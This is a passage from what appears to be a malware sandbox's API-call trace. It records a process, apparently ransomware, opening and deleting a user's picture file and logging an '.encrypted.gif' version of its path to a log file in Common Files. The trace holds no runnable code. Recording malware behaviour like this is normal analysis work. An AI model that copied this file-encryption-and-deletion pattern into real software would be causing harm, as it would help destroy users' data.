lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0040.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.297] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.297] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.297] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9fb7f40, ftCreationTime.dwHighDateTime=0x1d5b788, ftLastAccessTime.dwLowDateTime=0xf44f8ae0, ftLastAccessTime.dwHighDateTime=0x1d5b7a8, ftLastWriteTime.dwLowDateTime=0xf44f8ae0, ftLastWriteTime.dwHighDateTime=0x1d5b7a8, nFileSizeHigh=0x0, nFileSizeLow=0x17198, dwReserved0=0x0, dwReserved1=0x777648, cFileName="SF5U9BKNVl3bd-lE1Z7.gif", cAlternateFileName="SF5U9B~1.GIF")) returned 0x7c2240 [0040.297] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0040.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.297] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.297] CharLowerBuffW (in: lpsz="byte[94616]", cchLength=0xb | out: lpsz="byte[94616]") returned 0xb [0040.298] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.298] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.298] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.298] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.298] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.298] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0040.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.299] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.299] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.299] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.299] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.299] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.299] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.299] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.300] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.300] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\sf5u9bknvl3bd-le1z7.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0040.301] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.301] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.301] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.301] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.301] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.302] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.302] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.302] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.302] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.302] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.302] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.302] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.302] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.302] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.302] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.303] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.303] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.303] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.303] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif", lpFilePart=0x0) returned 0x50 [0040.303] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9fb7f40, ftCreationTime.dwHighDateTime=0x1d5b788, ftLastAccessTime.dwLowDateTime=0xf44f8ae0, ftLastAccessTime.dwHighDateTime=0x1d5b7a8, ftLastWriteTime.dwLowDateTime=0x17bbe580, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17198, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="SF5U9BKNVl3bd-lE1Z7.gif", cAlternateFileName="SF5U9B~1.GIF")) returned 0x7c2240 [0040.303] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\sf5u9bknvl3bd-le1z7.gif")) returned 1 [0040.305] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9fb7f40, ftCreationTime.dwHighDateTime=0x1d5b788, ftLastAccessTime.dwLowDateTime=0xf44f8ae0, ftLastAccessTime.dwHighDateTime=0x1d5b7a8, ftLastWriteTime.dwLowDateTime=0x17bbe580, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17198, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="SF5U9BKNVl3bd-lE1Z7.gif", cAlternateFileName="SF5U9B~1.GIF")) returned 0 [0040.305] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.305] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.305] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0040.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.306] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.306] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.306] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.306] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.306] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0040.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.307] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.307] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.307] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.307] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.307] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.307] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.307] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.307] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2d4a, lpOverlapped=0x0) returned 1 [0040.307] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0040.307] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2d4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.307] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.encrypted.gif\r\n", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0040.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5d) returned 0x87a9d8 [0040.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.encrypted.gif\r\n", cchWideChar=93, lpMultiByteStr=0x87a9d8, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\SF5U9BKNVl3bd-lE1Z7.encrypted.gif\r\n", lpUsedDefaultChar=0x0) returned 93 [0040.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0040.308] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x5c, lpOverlapped=0x0) returned 1 [0040.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.315] CloseHandle (hObject=0x128) returned 1 [0040.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0040.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0040.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0040.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.319] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.319] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0040.320] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.320] HeapFree (in: 